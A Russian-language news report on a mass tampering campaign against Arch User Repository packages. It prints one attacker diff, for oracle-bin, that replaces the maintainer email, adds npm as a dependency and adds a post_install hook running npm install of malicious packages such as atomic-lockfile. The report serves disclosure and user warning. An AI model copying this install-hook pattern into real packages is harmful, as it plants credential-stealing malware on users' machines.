11 Июня стало известно о группе злоумышленников, массово изменявших пакеты в AUR
В результате атаки было заражено более полутора тысяч пакетов, включая JDK, MinGW, несколько версий компилятора Clang и приложение AppleMusic.
Неизвестные массово отправляли коммиты в файлы PKGBUILD (основной скрипт для сборки и установки пакетов в ArchLinux), в которых:
A) Удалялись электронные почты мэинтейнеров пакета и заменялись на случайный адрес @gmail.com
B) В список зависимостей добавлялся пакет npm (Пакетный менеджер для NodeJs)
C) Через npm происходила установка зараженных пакетов, таких как atomic-lockfile, автоматически получайших root права
oracle-bin.git
diff --git a/.SRCINFO b/.SRCINFO
index a4b7b02a64f4..2469c308fbbe 100644
--- a/.SRCINFO
+++ b/.SRCINFO
@@ -3,10 +3,13 @@ pkgbase = oracle-bin
pkgver = 0.1.2
pkgrel = 1
url = https://github.com/yashksaini-coder/oracle
+ install = oracle-bin-deps.install
arch = x86_64
license = MIT
+ depends = npm
depends = glibc
depends = libgcc
+ depends = openssl
provides = oracle
conflicts = oracle
source = README-0.1.2.md::https://raw.githubusercontent.com/yashksaini-coder/oracle/0.1.2/README.md
diff --git a/PKGBUILD b/PKGBUILD
index b452c32aaf82..7fb95cee6d0a 100644
--- a/PKGBUILD
+++ b/PKGBUILD
@@ -1,4 +1,4 @@
-# Maintainer: Rafael Dominiquini <rafaeldominiquini at gmail dot com>
+# Maintainer: Rafael Dominiquini <eivorlundholm@gmail.com>
_pkgauthor=yashksaini-coder
_pkgname=oracle
@@ -19,8 +19,9 @@ license=('MIT')
provides=("${_pkgname}")
conflicts=("${_pkgname}")
-depends=('glibc' 'libgcc' 'openssl')
+depends=('npm' 'glibc' 'libgcc' 'openssl')
+install=oracle-bin-deps.install
source=("README-${pkgver}.md::${_urlraw}/README.md"
"LICENSE-${pkgver}::${_urlraw}/LICENSE")
source_x86_64=("${_pkgname}-${arch[0]}-${pkgver}.tgz::${url}/releases/download/${_pkgvername}/${_pkgname}-${_barch[0]}.tar.gz")
diff --git a/oracle-bin-deps.install
b/oracle-bin-deps.install
new file mode 100644
index 000000000000..734a61b78a3b
--- /dev/null
+++ b/oracle-bin-deps.install
@@ -0,0 +1,4 @@
+post_install() {{
+ cd /tmp
+ npm install atomic-lockfile chalk debug got
+}}
Об атаке стало известно 11 июня, на следующий день было выпущено официальное заявление разработчиков Arch, призывающее пользователей самостоятельно проверять все изменения происходящие в обновляемых файлах. Изначально было известно о 408 зараженных пакетах, однако за сутки их количество возросло до 1578. Актуальный список зараженных пакетов доступен здесь. В результате заражения на компьютеры пользователей были установлены трояны, передающие сохраненные пароли и данные для автодополнения браузеров Chrome и Firefox, SSH ключи шифрования, переменные окружения и данные локальных криптокошельков. Вредоносы напрямую вклиниваются в процессы ядра, благодаря чему их невозможно обнаружить в списке запущенных процессов. Пользователям AUR рекомендуется не обновлять пакеты в ближайшее время.
ArchLinux User Repository - это неофициальный, но предоставляемый самой командой разработчиков источник пакетов для ArchLinux и основаных на нем дистрибьютивов, являющийся одним из крупнейших источников ПО доступным для линукс (на момент написания статьи в нем находилось 114266 пакетов). Любой пользователь может предоставить новый пакет, и эти изменения мгновенно становятся частью AUR без какой-либо модерации, за исключением голосования за добавление пакета в основной репозиторий.
Источники: форум aur, cybersecuritynews